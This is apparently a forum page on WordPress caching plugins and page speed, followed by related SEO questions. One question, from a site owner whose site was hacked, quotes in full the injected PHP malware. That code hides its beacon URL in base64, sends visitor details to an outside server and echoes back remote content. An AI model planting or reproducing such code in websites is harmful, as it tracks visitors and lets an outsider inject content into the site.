Loading websites faster
-
Which are the best plugins for loading a website faster?
WP Smush.it + W3 Total Cache + having a good theme like Thesis?
Is this plugin good to have, or is having W3 Total Cache enough?
http://wordpress.org/plugins/db-cache-reloaded-fix/
Thanks!
Best regards,
Sebastian Papp & His Team
-
Hi,
The two most popular caching plugins for WordPress are probably:
http://wordpress.org/plugins/wp-super-cache/
and the W3 Total Cache one you mention.
Although they both have the same aim, the way they go about it is quite different. Depending on your technical knowledge, you may find Super Cache easier to set up and manage than W3 Total Cache.
For what it's worth, I doubt you'll find a plugin that is better than these two, but you may benefit from experimenting with both to see which suits your host better.
I'd suggest that if neither plugin makes a difference on its own, you may have issues with your host that need addressing.
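One quick way to confirm that whichever plugin you pick is actually serving cached pages: both leave an HTML comment footprint near the end of the page source. A rough PHP sketch - the URL is a placeholder, and the signature strings are assumptions that vary by plugin version:
<?php
// Fetch the homepage and look for the caching plugin's HTML footprint.
// Signature strings are assumptions and vary by plugin version.
$html = file_get_contents('http://www.example.com/');
if ($html === false) {
    die("Fetch failed\n");
}
if (stripos($html, 'W3 Total Cache') !== false
        || stripos($html, 'Super Cache') !== false) {
    echo "Cache signature found - cached pages are being served\n";
} else {
    echo "No cache signature - worth re-checking the plugin settings\n";
}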
-
I prefer Total Cache with a CDN. How you set up Total Cache can also make a HUGE difference, and it seems to depend somewhat on the server/host you're with. I usually set up the top two options, then ONE of the next two (database or object caching). After that, hook into a CDN like CloudFlare and you should be screaming.
Check after each change you make in Pingdom Tools or Google's PageSpeed Insights.
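For a quick scriptable number to compare between tweaks, a rough PHP sketch (placeholder URL; this times a single request, so it's no substitute for a full Pingdom waterfall):
<?php
// Time a single page fetch - crude, but fine for before/after comparisons.
$ch = curl_init('http://www.example.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
printf("Total time: %.3fs\n", curl_getinfo($ch, CURLINFO_TOTAL_TIME));
curl_close($ch);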
Related Questions
-
Linking Websites/ Plagiarized Content Ranking Above Original Content
Hey friends! Sooo this article was originally published in December 2016: https://www.realwealthnetwork.com/learn/best-places-to-buy-rental-property-2017/ It has been consistently ranking in positions 2-3 for the long-tail keyword "best places to buy rental property 2017" (and related keywords) since January-ish, and getting about 2,000-2,500 unique views per week, until last week when it completely dropped off the internet (it's now ranking 51+).
We just did a site redesign and changed some URL structures, but I created a redirect, so I don't understand why that would affect our ranking so much. Plus all of our other top pages have held their rankings -- in fact, our top organic article actually moved up from position 3 to 2 for much more competitive keywords (1031 exchange).
What's even weirder is when I copy sections of my article and paste them into Google with quotes, our website doesn't show up anywhere. Other websites that have plagiarized my article (some have included links back to the article, and some haven't) are ranking, but mine is nowhere to be found. Here are some examples: https://www.dawgsinc.com/rental-property-the-best-places-to-buy-in-the-year-2017/ http://b2blabs.com/2017/08/rental-property-the-best-places-to-buy-in-the-year-2017/ https://www.linkedin.com/pulse/best-places-buy-rental-property-year-2017-missy-lawwill/?trk=mp-reader-card http://news.sys-con.com/node/4136506
Is it possible that Google thinks my article is newer than the copycat articles, because of the new URL, and now I'm being flagged as spam? Does it think these are spam websites we've created to link back to our own content? Also, clearly my article is higher quality than the ranking articles. Why are they showing up? I double-checked the redirect. It's good. The page is indexed... Ahhh what is going on?! Thanks for your help in advance!
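For anyone wanting to spot-check a redirect like the one described, a minimal PHP sketch (the URL is a placeholder for the old address):
<?php
// Spot-check that the old URL returns a 301 and points where expected.
$headers = get_headers('https://www.example.com/old-url/', 1);
echo $headers[0] . "\n";           // e.g. "HTTP/1.1 301 Moved Permanently"
if (isset($headers['Location'])) {
    print_r($headers['Location']); // the redirect target(s)
}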
White Hat / Black Hat SEO | Jessica7110 -
Hosting Multiple Websites Within The Same Server Space
Hi, So, I have a client who wants to host two websites (which you could refer to as sister sites) on the same hosting account. For some reason, I was under the impression that doing so may be detrimental for SEO purposes. Am I correct in thinking this? Can I get some backup documentation or comments here? I look forward to hearing what you all have to say. Thanks for reading!
White Hat / Black Hat SEO | maxcarnage0 -
Moving website and domain name without 301 Redirect or rel=canonical
I do not wish to draw attention to my company, so I am using code names. For the sake of this discussion, we are a new car dealership representing Brand X Cars. The manufacturer of Brand X Cars pushes its dealers toward a website hosting company called CarWebsites in order to maintain a level of quality and control with each dealer. However, we have found the platform to be too restricting, and are switching to our own WordPress site. Unfortunately Brand X is claiming ownership of our original domain, BrandXCarDealer.net, so we have switched to BrandXCarDealer.com (which we prefer anyway).
Now both websites are running, and there is duplicate content of everything. Brand X is not cooperative and will not 301 redirect to the new site, and we do not have access to the <head> of the website to add a rel=canonical. Brand X is also dragging its feet on shutting down BrandXCarDealer.net. We do still have access to change the content of the pages on the BrandXCarDealer.net site, but that is pretty much as far as our control goes.
So my question is, is there anything we can do, without using a 301 redirect or rel=canonical, to tell Google to pay attention to the new BrandXCarDealer.com rather than the old BrandXCarDealer.net? Any suggestions are appreciated. Thanks!
White Hat / Black Hat SEO | VanMaster0 -
Hreflang/Canonical Inquiry for Website with 29 different languages
Hello, So I have a website (www.example.com) that has 29 subdomains (es.example.com, vi.example.com, it.example.com, etc). Each subdomain has the exact same content for each page, completely translated in its respective language. I currently do not have any hreflang/canonical tags set up.
I was recently told that this (below) is the correct way to set these tags up: for each subdomain (es.example.com/blah-blah for this example), I need to place an hreflang tag pointing to the page the subdomain is on (es.example.com/blah-blah), in addition to every one of the other 28 subdomains that have that page (it.example.com/blah-blah, etc). In addition, I need to place a canonical tag pointing to the main www. version of the website. So I would have 29 hreflang tags, plus a canonical tag.
When I brought this to a friend's attention, he said that pointing the canonical tag at the main www. version would cause the subdomains to drop out of the SERPs in their respective country search engines, which I obviously wouldn't want. I've tried to read articles about this, but I always end up hitting a wall and further confusing myself. Can anyone help? Thanks!
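For illustration, a minimal PHP sketch of the tags one language version might emit for the es.example.com/blah-blah page from the question. The canonical here is self-referencing rather than pointing at www (which is what the friend is warning about); the x-default line is a common convention rather than something from the thread, and the language list is truncated for space:
<?php
// Tags the Spanish version of /blah-blah might emit (illustrative sketch).
$codes = array('es', 'vi', 'it'); // ...plus the remaining language codes
$path  = '/blah-blah';

// Self-referencing canonical for this language version.
echo '<link rel="canonical" href="https://es.example.com' . $path . '" />' . "\n";

// One hreflang per language version, including this page's own language.
foreach ($codes as $code) {
    echo '<link rel="alternate" hreflang="' . $code . '" href="https://' . $code . '.example.com' . $path . '" />' . "\n";
}

// x-default for users whose language doesn't match any listed version.
echo '<link rel="alternate" hreflang="x-default" href="https://www.example.com' . $path . '" />' . "\n";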
White Hat / Black Hat SEO | juicyresults0 -
How to re-rank an established website with new content
I can't help but feel this is a somewhat untapped resource with a distinct lack of information.
There is a massive amount of information around on how to rank a new website, or techniques in order to increase SEO effectiveness, but to rank a whole new set of pages or indeed to 're-build' a site that may have suffered an algorithmic penalty is a harder nut to crack in terms of information and resources. To start I'll provide my situation; SuperTED is an entertainment directory SEO project.
It seems likely we may have suffered an algorithmic penalty at some point around Penguin 2.0 (May 22nd), as traffic dropped steadily from then on, though not too aggressively. Then, to coincide with the newest Panda 27 (according to Moz) in late September this year, we decided it was time to re-assess tactics to keep in line with Google's guidelines. We've slowly built a natural link profile over this time, but it's likely thin content was also an issue. So from the beginning of September to the end of October we took these steps:
- Contacted webmasters (and unfortunately there was some 'paid' link-building before I arrived) to remove links.
- 'Disavowed' the rest of the unnatural links that we couldn't have removed manually.
- Worked on pagespeed as per Google guidelines until we received high scores in the majority of 'speed testing' tools (e.g. WebPageTest).
- Redesigned the entire site with speed, simplicity and accessibility in mind.
- Htaccessed 'fancy' URLs to remove file extensions and simplify the link structure.
- Completely removed two or three pages that were quite clearly just trying to 'trick' Google - think a large page of links that simply said 'Entertainers in London', 'Entertainers in Scotland', etc. 404'ed and asked for URL removal via WMT; thinking of 410'ing?
- Added new content and pages that seem to follow Google's guidelines as far as I can tell, e.g. main category pages and sub-category pages.
- Started to build new links to our now 'content-driven' pages naturally by asking our members to link to us via their personal profiles. We offered a reward system internally for this, so we've seen a fairly good turnout.
- Addressed many other 'possible' ranking factors: adding Schema data, optimising for mobile devices as best we can, adding a blog and beginning to blog original content, expanding our social media reach, custom 404 pages, removing duplicate content, utilising Moz, and much more.
It's been a fairly exhaustive process, but we were happy to do it to stay within Google's guidelines. Unfortunately, some of those link-wheel pages mentioned previously were the only pages driving organic traffic, so once we were rid of them, traffic dropped to not even 10% of what it was previously. Equally, with the changes (htaccess) to the link structure and the creation of brand new pages, we've lost many of the pages that previously held Page Authority.
We've 301'ed the pages that have been 'replaced' with much better content and a different URL structure - http://www.superted.com/profiles.php/bands-musicians/wedding-bands to simply http://www.superted.com/profiles.php/wedding-bands, for example. Therefore, with the loss of the 'spammy' pages and the creation of brand new 'content-driven' pages, we've probably lost up to 75% of the old website, including the pages that were driving any traffic at all (even with potential thin-content algorithmic penalties). Because of the loss of entire pages, the changed URLs and the rest discussed above, the site probably looks very new and very recently updated. What I need to work out is a campaign to drive traffic to the 'new' site.
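For reference, a 301 of the shape described above is a one-liner whether done in .htaccess or at the top of the old PHP page. A minimal PHP sketch using the question's own URLs:
<?php
// Permanent redirect from the old profile URL to the new, shorter one.
header('Location: http://www.superted.com/profiles.php/wedding-bands', true, 301);
exit;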
We're naturally building links through our own customer base, so they will likely be seen as quality, natural link-building.
Perhaps the sudden occurrence of a large number of 404s and 'lost' pages is affecting us?
Perhaps we're yet to be properly re-indexed, but it has been almost a month since most of the changes were made, and we'd often be re-indexed 3 or 4 times a week before the changes.
Our events page is the only one without the new design left to update, could this be affecting us? It potentially may look like two sites in one.
Perhaps we need to wait until the next Google 'link' update to feel the benefits of our link audit.
Perhaps simply getting rid of many of the 'spammy' links has done us no favours - I should point out we've never been issued with a manual penalty. Was I perhaps too hasty in following the rules?
Would appreciate a professional opinion, or input from anyone who has experience with a similar process. It does seem fairly odd that following guidelines and general white-hat SEO advice could cripple a domain, especially an established one (the domain is 10+ years old) with relatively good domain authority within the industry. Many, many thanks in advance. Ryan.
White Hat / Black Hat SEO | ChimplyWebGroup -
Website has been hacked - will this hurt ranking?
Today we found out that a website of ours has been hacked and that they put this code in multiple index.php files:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
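// Note: the base64 string above decodes to http://mbrowserstats.com/statH/stat.php,
// so the script reports visitor IP, user agent, domain and path to that remote server.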
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
After some search I found other people mentioning this problem too. They were also talking about how this could have an impact on your search rankings. My first question: Will this hurt my rankings? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking because of it? Grtz, Ard
White Hat / Black Hat SEO | GTGshops -
Need help please with website ranking problem!
I am currently struggling with our site www.discountbannerprinting.co.uk to rank our PVC banners page http://www.discountbannerprinting.co.uk/banners/vinyl-pvc-banners.html. On the UK search I have the following positions:
hfe-signs.co.uk/banners.php
signfirm.com/banners.html
bigvaluebanners.co.uk/PVC_Banners_High_Quality_Cheap_Outdoor_PVC_Mesh_Full_Colour_Banner/
bannerprintingandroid.co.uk/pvc-banners/
printedbannersandsigns.co.uk/
your-print.co.uk/pvc-banners-special.html
bannerbuzz.co.uk/pvc-banners
bannerbuzz.co.uk/
auraprint.co.uk/products/banners/
vinylprinting.co.uk/pvc_banners.html
banners.co.uk/CustomBanners-BlankBanners.htm
and then us - http://www.discountbannerprinting.co.uk/banners/vinyl-pvc-banners.html
I can't decide if it is the URL structure of the site, too many links in the left-hand nav diluting power, keywords, etc., but it does not look right that we are so far down - at least 2 of the pages above us have no content at all, and some have no links or social either. Any help would be appreciated.
White Hat / Black Hat SEO | BobAnderson -
What happens when content on your website (and blog) is an exact match to multiple sites?
In general, I understand that having duplicate content on your website is a bad thing. But I see a lot of small businesses (specifically dentists in this example) who hire the same company to provide content to their site. They end up with the EXACT same content as other dentists. Here is a good example: http://www.hodnettortho.com/blog/2013/02/valentine’s-day-and-your-teeth-2/ http://www.braces2000.com/blog/2013/02/valentine’s-day-and-your-teeth-2/ http://www.gentledentalak.com/blog/2013/02/valentine’s-day-and-your-teeth/ If you google the title of that blog article you find tons of the same article all over the place. So, overall, doesn't this make the content on these blogs irrelevant? Does this hurt the SEO on these sites at all? What is the value of having completely unique content on your site/blog vs having duplicate content like this?
White Hat / Black Hat SEO | MorganPorter0